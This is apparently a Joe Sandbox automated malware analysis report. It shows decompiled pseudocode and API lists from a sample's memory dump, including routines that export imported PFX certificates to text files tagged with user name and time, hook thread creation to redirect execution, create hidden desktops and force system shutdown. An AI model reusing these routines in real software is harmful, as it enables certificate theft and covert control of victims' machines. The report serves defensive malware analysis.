    • Instruction ID: a4cdc2af4e8429626b765b3d249f997a9a300350ebb3a861ebdab98f345a25fc
    • Opcode Fuzzy Hash: 5ddd9318bc1beb9cae27247ebc4d7abe6bdf830309cb65f3256c1863fd2f98ee
    • Instruction Fuzzy Hash: 9AF0896671111256E7301A3EEDCDB7B2ADDDB857B17148719F662C11D0D76488825630
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 20%
    			E012B1B1D(intOrPtr __eax, void* __esi) {
    				void* _t52;
    				short* _t53;
    				void* _t55;
    				void* _t56;
    				void* _t57;
    				void* _t60;
    				void* _t68;
    				intOrPtr* _t69;
    				void* _t74;
    				void* _t76;
    
    				_t74 = _t76 - 0x6c;
    				_t53 =  *((intOrPtr*)(_t74 + 0x78));
    				_t69 =  *((intOrPtr*)(_t74 + 0x74));
    				__imp__PFXImportCertStore(_t69, _t53,  *(_t74 + 0x7c), _t68, _t52);
    				 *((intOrPtr*)(_t74 + 0x78)) = __eax;
    				if(__eax != 0 && ( *(_t74 + 0x7c) & 0x10000000) == 0 && _t69 != 0 &&  *_t69 > 0 &&  *((intOrPtr*)(_t69 + 4)) != 0 && L012B150A() != 0) {
    					GetSystemTime(_t74 + 0x50);
    					_t55 = 0x38;
    					L012B1479(_t55, _t74 - 0x7c);
    					_t56 = 0x39;
    					L012B1479(_t56, _t74 + 0x40);
    					E012B37D3(_t74 - 0x284);
    					_push( *(_t74 + 0x50) & 0x0000ffff);
    					_push( *(_t74 + 0x52) & 0x0000ffff);
    					_push( *(_t74 + 0x56) & 0x0000ffff);
    					_push(_t74 + 0x40);
    					if(L012B1A8C(_t74 - 0x3c, 0x3e, _t74 - 0x7c, _t74 - 0x284) > 0) {
    						_push( *_t69);
    						_push( *((intOrPtr*)(_t69 + 4)));
    						_push(_t74 - 0x3c);
    						_t57 = 2;
    						if(L012B1B86(_t57, 0) != 0 && _t53 != 0 &&  *_t53 != 0) {
    							L012B101E(_t74 - 0x3c, 4);
    							if(L012B169A(_t53, L".txt" | 0xffffffff, _t74 + 0x60) != 0) {
    								_push( *((intOrPtr*)(_t74 + 0x68)));
    								_push( *((intOrPtr*)(_t74 + 0x60)));
    								_push(_t74 - 0x3c);
    								_t60 = 2;
    								L012B1B86(_t60, 0);
    								L012B138E(_t74 + 0x60);
    							}
    						}
    					}
    				}
    				return  *((intOrPtr*)(_t74 + 0x78));
    			}














    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 012B39DC
    • GetSystemTime.KERNEL32(?), ref: 012B3A27
      • Part of subcall function 012B37D3: GetUserNameExW.SECUR32(00000002,?,?), ref: 012B37E5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CertImportNameStoreSystemTimeUser
    • String ID: .txt
    • API String ID: 3421741743-2195685702
    • Opcode ID: d4fa85295894becc2472fbf3d31563d4260b875f717f16fd9fc37f957eb4341c
    • Instruction ID: 217c0f0546cdf6fc204210e75a6089925a783b6e64d4281316ae9e05164cb0f3
    • Opcode Fuzzy Hash: d4fa85295894becc2472fbf3d31563d4260b875f717f16fd9fc37f957eb4341c
    • Instruction Fuzzy Hash: BA31A371A1020AAAEB24EFE8DCC4BFE77A9FF58390F144419BA2196094EB75D454CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E012C80B0(void* __edx, void* __esi) {
    				signed int _v120;
    				signed char _t12;
    
    				_t12 =  *0x12dd318;
    				if((_t12 & 0x00000010) == 0) {
    					if((_t12 & 0x00000008) != 0) {
    						L012B1488(__esi);
    						_t12 =  *0x12dd318;
    					}
    					if((_t12 & 0x00000003) == 0) {
    						if((_t12 & 0x00000004) != 0) {
    							return ExitWindowsEx(0x14, 0x80000000);
    						}
    						return _t12;
    					} else {
    						L012B19C9(L"SeShutdownPrivilege", 1);
    						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x12dd318 >> 0x00000001 & 0x00000001, 0x80000000);
    						return 0;
    					}
    				} else {
    					if(L012B117C(_t12,  &_v120, __edx, __esi) == 0) {
    						return 0;
    					} else {
    						_v120 = _v120 | 0x00000020;
    						 *0x12dc738 =  *0x12dc738 | 0x00000010;
    						L012B10E1( &_v120);
    						E012C1A81();
    						return 1;
    					}
    				}
    			}





    APIs
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 012C80F5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: InitiateShutdownSystem
    • String ID: SeShutdownPrivilege
    • API String ID: 267423221-3733053543
    • Opcode ID: 5256b4c054cc3382e78081e4324f2b6babbdd7024e37a27ce4e2932da989a03e
    • Instruction ID: 40bdfc4bea2edf6150420d3ae0e96895d0e96e680542b5f3fed1c5c773ee15fa
    • Opcode Fuzzy Hash: 5256b4c054cc3382e78081e4324f2b6babbdd7024e37a27ce4e2932da989a03e
    • Instruction Fuzzy Hash: 1AF0E530531683AAFE24877CBC5DFF51B54D701B84F184408EB80A6194C9555402D765
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E012C2BCD(void* __edx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
    				long _v8;
    				intOrPtr _v16;
    				intOrPtr _v28;
    				void _v32;
    				void* __edi;
    				void* _t20;
    				void* _t26;
    				signed int _t29;
    				void* _t30;
    				CONTEXT* _t31;
    				void* _t35;
    				void* _t37;
    				void* _t38;
    
    				_t35 = __edx;
    				_t20 = L012B150A();
    				_t31 = _a24;
    				if(_t20 != 0 && NtQueryInformationProcess(_a16, 0,  &_v32, 0x18,  &_v8) >= 0 && _v28 != 0) {
    					_t32 = _v16;
    					if(_v16 == 0) {
    						L5:
    						_push(_t37);
    						_t38 = L012B1C44(_v16, _t35, _t37, _t44);
    						_t45 = _t38;
    						if(_t38 != 0) {
    							_t26 = L012B1A05(_a16, _t38, _t45, 0);
    							if(_t26 != 0) {
    								_t29 = _t26 -  *0x12dc74c + E012B1474;
    								if(( *0x12dc738 & 0x00000010) != 0) {
    									_t29 = _t29 ^  *(_t31 + 0xb0);
    								}
    								 *(_t31 + 0xb0) = _t29;
    							}
    							CloseHandle(_t38);
    						}
    					} else {
    						_t30 = L012B18A2(_t32);
    						_t44 = _t30;
    						if(_t30 == 0) {
    							goto L5;
    						}
    					}
    				}
    				return NtCreateThread(_a4, _a8, _a12, _a16, _a20, _t31, _a28, _a32);
    			}
















    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 012C2BEF
    • CloseHandle.KERNEL32(00000000,00000000), ref: 012C2C4F
    • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 012C2C6C
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CloseCreateHandleInformationProcessQueryThread
    • String ID:
    • API String ID: 2341911113-0
    • Opcode ID: 0c3448bb896ffc1a65d485d5ae3ebfe80ce47053e17bf3ba72afbb0030bd6fad
    • Instruction ID: 0eee076d4baf5b59d15f1278cba4e9e09d2bdec25fda2b985e271dfedf93b660
    • Opcode Fuzzy Hash: 0c3448bb896ffc1a65d485d5ae3ebfe80ce47053e17bf3ba72afbb0030bd6fad
    • Instruction Fuzzy Hash: 84118E3151020AEBEF159FA8E994BFE3B6AFF44740F150128EB0155195DB30D921DB11
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000002,00000011), ref: 012B6E40
    • bind.WS2_32(00000000,?,-0000001D), ref: 012B6E60
    • closesocket.WS2_32(00000000), ref: 012B6E6B
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: bindclosesocketsocket
    • String ID:
    • API String ID: 1873677229-0
    • Opcode ID: e3025f32c59eddf35bfb4faa565127f7b4578d3bafbd9104e9f668f08fc57c6f
    • Instruction ID: 34d7ea470ee7fb107e42ce9e9d3b4db73823b0499382afc2ea4627435bb8801b
    • Opcode Fuzzy Hash: e3025f32c59eddf35bfb4faa565127f7b4578d3bafbd9104e9f668f08fc57c6f
    • Instruction Fuzzy Hash: 50E09B3761101156E3301B3DFC4EEBB39A99F967B17194715BA72D20D1D7788C829230
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • select.WS2_32(00000000,?,00000000,00000000,?), ref: 012B68B7
    • recv.WS2_32(?,?,?,00000000), ref: 012B68D0
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: recvselect
    • String ID:
    • API String ID: 741273618-0
    • Opcode ID: adb3b724d8fbda31da020b474692a3148a545d5b35fb08e91f424fb3c919866a
    • Instruction ID: f7a38d8d650be4f6bf2f23326fd142931e8332a7eed8ab228bee7fbdda7d815a
    • Opcode Fuzzy Hash: adb3b724d8fbda31da020b474692a3148a545d5b35fb08e91f424fb3c919866a
    • Instruction Fuzzy Hash: 500171B1E10218ABDB1D8B58DC45BEDBBB9AB45720F14827AB626E61C0D6B05A458B80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E012C7B5C(char* __ecx) {
    				void* _v40;
    				intOrPtr _v46;
    				signed char _v48;
    				struct _OSVERSIONINFOW _v324;
    				int _t15;
    				signed int _t18;
    				short _t22;
    				void* _t25;
    				char* _t26;
    
    				_t25 = 6;
    				_t26 = __ecx;
    				L012B19F6(__ecx, _t25);
    				_v324.dwOSVersionInfoSize = 0x11c;
    				_t15 = GetVersionExW( &_v324);
    				if(_t15 != 0) {
    					__imp__GetNativeSystemInfo( &_v40);
    					 *_t26 = L012B1532();
    					_t18 = 0;
    					if(_v48 <= 0xff && _v46 == 0) {
    						_t18 = _v48 & 0x000000ff;
    					}
    					 *(_t26 + 1) = _t18;
    					asm("sbb eax, eax");
    					 *((short*)(_t26 + 2)) =  !0xffff & _v324.dwBuildNumber;
    					_t22 = _v40;
    					 *((short*)(_t26 + 4)) = _t22;
    					return _t22;
    				}
    				return _t15;
    			}












    APIs
    • GetVersionExW.KERNEL32(?), ref: 012C7B81
    • GetNativeSystemInfo.KERNEL32(?), ref: 012C7B8F
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: InfoNativeSystemVersion
    • String ID:
    • API String ID: 2296905803-0
    • Opcode ID: a3e3bca186dd3158eaa5926bada76636fc874d82757420007579d976c788bc16
    • Instruction ID: fe1d643614ee0e56e163138dfe57ce87b6fe0700434efce1823f8ce74c9ae6fa
    • Opcode Fuzzy Hash: a3e3bca186dd3158eaa5926bada76636fc874d82757420007579d976c788bc16
    • Instruction Fuzzy Hash: 6301D63591125A4ADB30EBB9D9056EDB7F4EF08700F0085AAD645E3280FA34EA44CF65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012D022B(WCHAR* __ecx, long __edx) {
    				char _v20;
    				struct HDESK__* _t2;
    				long _t5;
    				void* _t7;
    				WCHAR* _t10;
    
    				_t10 = __ecx;
    				_t5 = __edx;
    				if(__ecx == 0) {
    					_t10 =  &_v20;
    					_t7 = 0x5b;
    					L012B1479(_t7, _t10);
    				}
    				_t2 = OpenDesktopW(_t10, 0, 0, _t5);
    				if(_t2 == 0) {
    					return CreateDesktopW(_t10, 0, 0, 0, _t5, 0);
    				}
    				return _t2;
    			}








    APIs
    • OpenDesktopW.USER32(?,00000000,00000000), ref: 012D024F
    • CreateDesktopW.USER32 ref: 012D025F
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Desktop$CreateOpen
    • String ID:
    • API String ID: 153846745-0
    • Opcode ID: 776cd8deae859f7ccee09dffd97c6e9c58c00d54db70d177ad8c18c00abab919
    • Instruction ID: e89259be5223c533ae69ed7944054105152c97f2aaac7492f27cb4c8fd072b9e
    • Opcode Fuzzy Hash: 776cd8deae859f7ccee09dffd97c6e9c58c00d54db70d177ad8c18c00abab919
    • Instruction Fuzzy Hash: 2CE04F767021353B9232226AAC8CDFF7E2EDEC6AF5B514815F249A21858AA09C0281F5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B3E69() {
    				struct _TIME_ZONE_INFORMATION _v176;
    				long _t6;
    				intOrPtr _t8;
    
    				_t6 = GetTimeZoneInformation( &_v176);
    				if(_t6 != 1) {
    					if(_t6 != 2) {
    						return 0;
    					} else {
    						_t8 = _v176.DaylightBias;
    						goto L4;
    					}
    				} else {
    					_t8 = _v176.StandardBias;
    					L4:
    					return (_t8 + _v176.Bias) * 0xffffffc4;
    				}
    			}






    APIs
    • GetTimeZoneInformation.KERNEL32(?), ref: 012B3E79
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    • Opcode ID: 8674632f22404c83b92f1d2b989fe1d0de282fbf07afb5ac9804af2c1f8c7299
    • Instruction ID: 135cc0307083d53c53e47a8d25a83cc3ba6338fd20d75c9180849e293855d4b6
    • Opcode Fuzzy Hash: 8674632f22404c83b92f1d2b989fe1d0de282fbf07afb5ac9804af2c1f8c7299
    • Instruction Fuzzy Hash: 31E01231F10208DBDF20D6A8E9CAB9DB7F8BB01348F110592E141E6141D674ED458B92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012C1A81() {
    
    				return ExitWindowsEx(0x14, 0x80000000);
    			}



    APIs
    • ExitWindowsEx.USER32(00000014,80000000), ref: 012C1A88
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: ExitWindows
    • String ID:
    • API String ID: 1089080001-0
    • Opcode ID: 2e7f0d786aa9a5257a9080de2d5b0ecfcb4e9c239a970bdd84a110a38dc5bafc
    • Instruction ID: 7aa4e2dbf559a6b80ebd5ecb5a4121e1bc8c86e08d35a76aa3af8aaf6cd7f965
    • Opcode Fuzzy Hash: 2e7f0d786aa9a5257a9080de2d5b0ecfcb4e9c239a970bdd84a110a38dc5bafc
    • Instruction Fuzzy Hash: 6AA002309411059AEE205760AE0DF4426509750702F6440546B0AA9198D5601055D629
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E012B636F(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed char _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _t83;
    				signed int _t85;
    				unsigned int _t87;
    				void* _t88;
    				signed char _t90;
    				signed char _t91;
    				signed char _t92;
    				signed char _t93;
    				signed char _t95;
    				signed char _t96;
    				intOrPtr* _t103;
    				intOrPtr _t104;
    				signed char _t105;
    				signed char _t106;
    				unsigned int _t111;
    				signed int _t112;
    				unsigned int _t113;
    				signed int _t114;
    				unsigned int _t115;
    				signed int _t116;
    				unsigned int _t118;
    				signed int _t120;
    				unsigned int _t121;
    				signed int _t122;
    				signed int _t124;
    				signed int _t125;
    				signed int _t127;
    				signed int _t138;
    				signed int _t139;
    				signed int _t145;
    				signed int _t150;
    				signed int _t160;
    				signed int _t162;
    				signed int _t168;
    				signed int _t170;
    				void* _t171;
    				void* _t176;
    
    				_v24 = __edx;
    				_t88 = __ecx;
    				_t90 = 0;
    				_t176 = 0;
    				_t160 = 0;
    				_v32 = 1;
    				_v28 =  *_a8;
    				while(1) {
    					_v20 = _t160;
    					if(_t90 == 0) {
    						_t111 =  *(_t176 + _t88);
    						_t176 = _t176 + 4;
    						_t91 = 0x1f;
    						_t112 = _t111 >> 0x1f;
    					} else {
    						_t91 = _t90 - 1;
    						_t112 = _t87 >> _t91 & 0x00000001;
    					}
    					_v16 = _t91;
    					if(_t112 == 0) {
    						goto L9;
    					}
    					if(_t176 >= _v24 || _t160 >= _v28) {
    						L61:
    						_t83 = 0;
    						L62:
    						return _t83;
    					} else {
    						 *((char*)(_t160 + _a4)) =  *(_t176 + _t88);
    						_t160 = _t160 + 1;
    						_t176 = _t176 + 1;
    						L8:
    						_t90 = _v16;
    						continue;
    					}
    					L9:
    					_v12 = 1;
    					L10:
    					L10:
    					if(_t91 == 0) {
    						_t113 =  *(_t176 + _t88);
    						_t176 = _t176 + 4;
    						_t92 = 0x1f;
    						_t114 = _t113 >> 0x1f;
    					} else {
    						_t92 = _t91 - 1;
    						_t114 = _t87 >> _t92 & 0x00000001;
    					}
    					_t162 = _t114 + _v12 * 2;
    					_v12 = _t162;
    					if(_t176 >= _v24 || _t162 > 0x1000002) {
    						goto L61;
    					}
    					if(_t92 == 0) {
    						_t115 =  *(_t176 + _t88);
    						_t176 = _t176 + 4;
    						_t93 = 0x1f;
    						_t116 = _t115 >> 0x1f;
    					} else {
    						_t93 = _t92 - 1;
    						_t116 = _t87 >> _t93 & 0x00000001;
    					}
    					if(_t116 != 0) {
    						if(_t162 != 2) {
    							if(_t176 >= _v24) {
    								goto L61;
    							}
    							_t118 = ( *(_t176 + _t88) & 0x000000ff) + (_t162 + 0xfffffffd << 8);
    							_t176 = _t176 + 1;
    							if(_t118 == 0xffffffff) {
    								_t85 = _v20;
    								 *_a8 = _t85;
    								_t83 = _t85 & 0xffffff00 | _t176 == _v24;
    								goto L62;
    							}
    							_t168 =  !_t118 & 0x00000001;
    							_t120 = (_t118 >> 1) + 1;
    							_v12 = _t120;
    							_v32 = _t120;
    							L30:
    							if(_t168 == 0) {
    								if(_t93 == 0) {
    									_t121 =  *(_t176 + _t88);
    									_t176 = _t176 + 4;
    									_t95 = 0x1f;
    									_t122 = _t121 >> 0x1f;
    								} else {
    									_t95 = _t93 - 1;
    									_t122 = _t87 >> _t95 & 0x00000001;
    								}
    								if(_t122 == 0) {
    									_v8 = 1;
    									L45:
    									L45:
    									if(_t95 == 0) {
    										_t87 =  *(_t176 + _t88);
    										_t176 = _t176 + 4;
    										_t96 = 0x1f;
    										_t124 = _t87 >> 0x1f;
    									} else {
    										_t96 = _t95 - 1;
    										_t124 = _t87 >> _t96 & 0x00000001;
    									}
    									_t125 = _t124 + _v8 * 2;
    									_v8 = _t125;
    									if(_t176 >= _v24 || _t125 >= _v28) {
    										goto L61;
    									}
    									if(_t96 == 0) {
    										_t87 =  *(_t176 + _t88);
    										_t176 = _t176 + 4;
    										_t95 = 0x1f;
    										_t127 = _t87 >> 0x1f;
    									} else {
    										_t95 = _t96 - 1;
    										_t127 = _t87 >> _t95 & 0x00000001;
    									}
    									_v16 = _t95;
    									if(_t127 == 0) {
    										goto L45;
    									} else {
    										_v8 = _v8 + 3;
    										goto L55;
    									}
    									goto L61;
    								} else {
    									if(_t95 == 0) {
    										_t87 =  *(_t176 + _t88);
    										_t176 = _t176 + 4;
    										_v16 = 0x1f;
    										_t138 = _t87 >> 0x1f;
    									} else {
    										_t105 = _t95 - 1;
    										_v16 = _t105;
    										_t138 = _t87 >> _t105 & 0x00000001;
    									}
    									_t139 = _t138 + 3;
    									L43:
    									_v8 = _t139;
    									L55:
    									_t170 = _v20;
    									asm("sbb ecx, ecx");
    									_v8 = _v8 +  ~0x500;
    									if(_v8 + _t170 > _v28 || _v12 > _t170) {
    										goto L61;
    									} else {
    										_t103 = _t170 - _v12 + _a4;
    										_v12 = _t103;
    										_t104 = _a4;
    										 *((char*)(_t170 + _t104)) =  *_t103;
    										_t171 = _t170 + 1;
    										_v12 = _v12 + 1;
    										do {
    											 *((char*)(_t171 + _t104)) =  *_v12;
    											_t171 = _t171 + 1;
    											_v12 = _v12 + 1;
    											_t73 =  &_v8;
    											 *_t73 = _v8 - 1;
    										} while ( *_t73 != 0);
    										goto L8;
    									}
    								}
    							}
    							if(_t93 == 0) {
    								_t87 =  *(_t176 + _t88);
    								_t176 = _t176 + 4;
    								_v16 = 0x1f;
    								_t145 = _t87 >> 0x1f;
    							} else {
    								_t106 = _t93 - 1;
    								_v16 = _t106;
    								_t145 = _t87 >> _t106 & 0x00000001;
    							}
    							_t139 = _t145 + 1;
    							goto L43;
    						}
    						_v12 = _v32;
    						if(_t93 == 0) {
    							_t87 =  *(_t176 + _t88);
    							_t176 = _t176 + 4;
    							_t93 = 0x1f;
    							_t168 = _t87 >> 0x1f;
    						} else {
    							_t93 = _t93 - 1;
    							_t168 = _t87 >> _t93 & 0x00000001;
    						}
    						goto L30;
    					} else {
    						if(_t93 == 0) {
    							_t87 =  *(_t176 + _t88);
    							_t176 = _t176 + 4;
    							_t91 = 0x1f;
    							_t150 = _t87 >> 0x1f;
    						} else {
    							_t162 = _v12;
    							_t91 = _t93 - 1;
    							_t150 = _t87 >> _t91 & 0x00000001;
    						}
    						_v12 = _t150 + _t162 * 2 - 2;
    						goto L10;
    					}
    					goto L61;
    				}
    			}















































    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5fc0df7198c2952aa6d83230121b629796a3092540dfd5d9c69a865571978738
    • Instruction ID: b6e7133056f0291e753cb8cb442818c0f80415ea53ba788264c2857e29417187
